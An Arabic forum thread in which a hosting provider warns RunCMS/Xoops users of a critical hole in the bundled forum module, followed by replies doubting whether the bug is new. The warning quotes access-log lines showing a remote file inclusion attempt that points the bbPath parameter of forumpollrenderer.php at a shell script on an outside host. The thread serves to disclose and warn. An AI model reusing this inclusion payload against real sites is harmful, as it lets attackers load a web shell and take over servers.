-
ثغرة مميته في مجلة اكسوبس RUNCMS ... هام جدا
السلام عليكم ورحمة الله ..
هام جدا لكل من يستخدم مجلة اكسوبس RUNCMS . أو يفكر بتركيبها .
تم اكتشاف ثغرة مميته في برنامج المنتديات المرفق بالمجلة .
85.185.7.31 - - [16/Dec/2006:04:09:15 -0500] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://freewebtown.com/farzinhacker/cshell.txt? HTTP/1.1" 404 - "-" "Opera/8.10 (Windows NT 5.1; U; en)"
85.185.7.31 - - [16/Dec/2006:04:09:21 -0500] "GET /favicon.ico HTTP/1.1" 200 2238 "http://www.*****.com/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://freewebtown.com/farzinhacker/cshell.txt?" "Opera/8.10 (Windows NT 5.1; U; en)"
85.185.7.31 - - [16/Dec/2006:04:12:51 -0500] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://freewebtown.com/farzinhacker/cshell.txt? HTTP/1.1" 404 - "-" "Opera/8.10 (Windows NT 5.1; U; en)"
85.185.7.31 - - [16/Dec/2006:04:13:40 -0500] "GET /favicon.ico HTTP/1.1" 200 2238 "http://www.****.net/modules/newbb_plus
حيث هذه الثغرة كفيله باختراق المجلة كاملة
هذه رساله تم إرسالها للعملاء الذين يستخدمون مجلة اكسوبس على سيرفراتنا .
Best Regards,
Ayman Ahmed
-
السلام عليكم
الأخ العزيز الوفائي العربي
أعتقد بأن هذه الثغرة قديمة في الاصدارت السابقة
لقد قمت بالبحث بواسطة google ولم أجد أي ثغرة بالاصدار runcms1.5
هل من الممكن وضع الرابط الذي وجدت الخبر فيه
-
اهلا وسهلا بك ابو فيصل
شوف عزيزي بالنسبة للموضوع لم انقله من موقع اخر . لكن ذلك حدث بالفعل لاحد المستضيفين على سيرفرنا . وللعلم انا لست من ناقلي المواضيع 
دخلت على الدعم الفني للمجلة http://www.24at24.com
لكن اظاهر ان الموقع مقفل بسبب هالثغرة . :shy:
تحياتي لك . وشكرا على مرورك الطيب ،،
Best Regards
ayman ahmed
ضوابط المشاركة
- لا تستطيع إضافة مواضيع جديدة
- لا تستطيع الرد على المواضيع
- لا تستطيع إرفاق ملفات
- لا تستطيع تعديل مشاركاتك
-
قوانين المنتدى
أضف موقعك هنا |
اضافة محتوى فريد لموقعك
رد مع اقتباس